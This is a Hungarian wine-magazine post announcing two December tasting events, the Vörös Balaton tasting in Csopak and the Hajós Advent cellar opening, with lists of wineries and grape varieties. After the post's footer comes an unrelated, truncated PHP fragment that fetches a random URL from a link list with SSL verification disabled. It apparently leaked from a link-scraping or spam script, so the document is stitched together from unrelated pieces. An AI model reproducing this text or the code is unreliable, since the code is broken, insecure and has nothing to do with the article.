Vidéki boros programok Mikulásra

Két szakmai programot is ajánlunk december második hétvégéjére. Hagyományosan minden év Mikulás körüli szombatján rendezi meg Jásdi István a Vörös Balaton elnevezésű eseményét a csopaki pincészetéhez tartozó borteraszán, melyre idén december 8-án kerül sor. A Hajósi Pincefalu már hagyományosnak mondható Adventi Pincenyitogatójára ugyanezen a napon kerül sor. Az immár negyedik alkalommal megrendezésre kerülő Vörös Balaton... View Article


Két szakmai programot is ajánlunk december második hétvégéjére. Hagyományosan minden év Mikulás körüli szombatján rendezi meg Jásdi István a Vörös Balaton elnevezésű eseményét a csopaki pincészetéhez tartozó borteraszán, melyre idén december 8-án kerül sor. A Hajósi Pincefalu már hagyományosnak mondható Adventi Pincenyitogatójára ugyanezen a napon kerül sor.

Az immár negyedik alkalommal megrendezésre kerülő Vörös Balaton sétálókóstolón limitált számú közönség tudja megkóstolni a legjobb balatoni vörösöket. Idén 13 borász mutatja meg pincéjének válogatott vörös szortimentjét. A kiállítók a szokásokhoz híven Jásdi István meghívására érkeznek majd borteraszra. Az idei évben a 2HA Szőlőbirtok és Pincészet, a Csobánci Bormanufaktúra, a Figula Pincészet, a Garamvári Szőlőbirtok, a Guden Kisbirtok, a Homola Pincészet, a Jásdi Pince, a Káli Kövek Borászat, a Kislaki Bormanufaktúra, a Pálffy Pince, a Petrányi Pince és Borterasz, a Szent Donát Birtok és a Villa Tolnay Borház vörösborait kóstolhatják majd a vendégek.

A IV. Vörös Balaton újdonsága, hogy a borkóstoló nem ér véget a Jásdi Borteraszon, hiszen az idén nyílt csopaki Szomszéd Kertje vacsorával, élő zenével várja a vendégeket a sétálókóstoló végeztével. A Vörös Balaton kapcsán a csopaki Petrányi Pince és Borterasz készül tematikus borvacsorával, aki pedig nem jut el Csopakra a hétvégén, Budapesten a Kóstolom Borbárban kaphat egy kis ízelítőt a Vörös Balaton hangulatából Légli Géza és természetesen Jásdi István tolmácsolásában.

A VinCE Magazin tavalyi beszámolója a Vörös Balatonról itt olvasható. Idén is ott leszünk a rendezvényen: tudósításunkat a VinCE online-on olvashatjátok az eseményt követően.

Közeledik az év utolsó rendezvénye a meseszép Hajósi Pincefaluban is. A már hagyományosnak mondható Adventi Pincenyitogató december 8-án, szombaton kerül megrendezésre. A fesztiválon 15 hajósi termelő nyitja ki borospincéjét, hogy idei év újborai mellett érettebb, komolyabb tételeit is kóstolásra kínálja. A karácsonyi hangulatot fokozva egy kisebb adventi vásárral is készülnek az ide látogatóknak, kiváló kikapcsolódási lehetőséget biztosítva minden korosztály számára.

Cabernet Franc és Sauvignon, Kékfrankos, Zweigelt, Kadarka, Olaszrizling, Cserszegi Fűszeres, Kövidinka, Irsai Olivér biztosan lesz a rendezvényen – a legfrissebbektől kezdve évjáratos különlegességekig a legkülönbözőbb fajta borokat lehet majd kóstolni.

(Visited 1 times, 1 visits today)

The post Vidéki boros programok Mikulásra appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>